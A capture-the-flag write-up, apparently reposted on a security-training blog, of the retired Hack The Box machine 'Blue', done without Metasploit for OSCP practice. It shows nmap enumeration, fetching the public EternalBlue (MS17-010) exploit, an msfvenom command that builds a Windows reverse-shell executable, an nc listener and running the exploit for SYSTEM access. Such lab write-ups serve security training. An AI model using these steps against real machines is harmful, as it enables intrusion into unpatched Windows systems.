Powered by Blogger.
Home » » Hack The Box — Blue Writeup w/o Metasploit

Hack The Box — Blue Writeup w/o Metasploit

Written By Akademy on Tuesday, November 5, 2019 | 9:51 PM

This is the 11th blog out of a series of blogs I will be publishing on retired HTB machines in preparation for the OSCP. The full list of OSCP like machines compiled by TJnull can be found here.
Let’s get started!


First thing first, we run a quick initial nmap scan to see which ports are open and which services are running on those ports.
nmap -sC -sV -O -oA initial
  • -sC: run default nmap scripts
  • -sV: detect service version
  • -O: detect OS
  • -oA: output all formats and store in file nmap/initial
We get back the following result showing that nine ports are open:
  • Port 139: running Microsoft Windows netbiois-ssn
  • Port 445: running microsoft-ds
  • Ports 135, 49152, 49153, 49154, 49155, 49156 & 49157: running msrpc
Before we start investigating these ports, let’s run more comprehensive nmap scans in the background to make sure we cover all bases.
Let’s run an nmap scan that covers all ports.
nmap -sC -sV -O -p- -oA full
We get back the following result. No other ports are open.
Similarly, we run an nmap scan with the -sU flag enabled to run a UDP scan.
nmap -sU -O -p- -oA udp
I managed to root the box and write this blog, while this UDP scan still did not terminate. So instead I ran another UDP scan only for the top 1000 ports.


As usual, we’ll run the general nmap vulnerability scan scripts to determine if any of the services are vulnerable.
nmap --script vuln -oA vuln
The box is vulnerable to EternalBlue! And guess what the EternalBlue exploit does? It gives me system access, so this box won’t be too difficult to solve. If you’re not familiar with EternalBlue, it exploits Microsoft’s implementation of the Server Message Block (SMB) protocol, where if an attacker sent a specially crafted packet, the attacker would be allowed to execute arbitrary code on the target machine.


Search for a non Metasploit exploit in the Exploit Database.
searchsploit --id MS17-010
We’re working with Windows 7 so we’ll use exploit # 42315. Clone the exploit into the working directory.
searchsploit -m 42315
After looking at the source code, we need to do three things:
  1. Download mysmb.py since the exploit imports it. The download location is included in the exploit.
  2. Use MSFvenom to create a reverse shell payload (allowed on the OSCP as long as you’re not using meterpreter).
  3. Make changes in the exploit to add the authentication credentials and the reverse shell payload.
First, download the file and rename it to mysmb.py
wget https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/42315.py
mv 42315.py.1 mysmb.py
Second, use MSFvenom to generate a simple executable with a reverse shell payload.
msfvenom -p windows/shell_reverse_tcp -f exe LHOST= LPORT=4444 > eternal-blue.exe
Third, we need change the exploit to add credentials. In our case we don’t have valid credentials, however, let’s check to see if guest login is allowed.
If you run enum4linux, you can see that guest login is supported.
enum4linux -a
  • -a: Do all simple enumeration
We’ll add that to the exploit script.
Similarly, we’ll add the reverse shell executable location and get the script to execute it.
Now that we’re done all three tasks, setup a listener on your attack machine.
nc -nlvp 4444
Then run the exploit.
python 42315.py
We have a shell with system privileges!
Grab the user flag.
Grab the root flag.

Lessons Learned

I keep repeating this in most of my HTB writeup blogs and I’ll say it again, it goes without saying that you should always update your systems especially when updates are released for critical vulnerabilities! If the system administrator had installed the MS17–010 security update, I would have had to find another way to exploit this machine.
Share this article :


Trung Tâm Đào Tạo An Toàn Thông Tin Học Hacker Mũ Xám Online | Học An Ninh Mạng Trực Tuyến | CEH VIỆT NAM
Copyright © 2013. HACKER MŨ XÁM - All Rights Reserved
Web Master @ Võ Sĩ Máy Tính
Contact @ Đông Dương ICT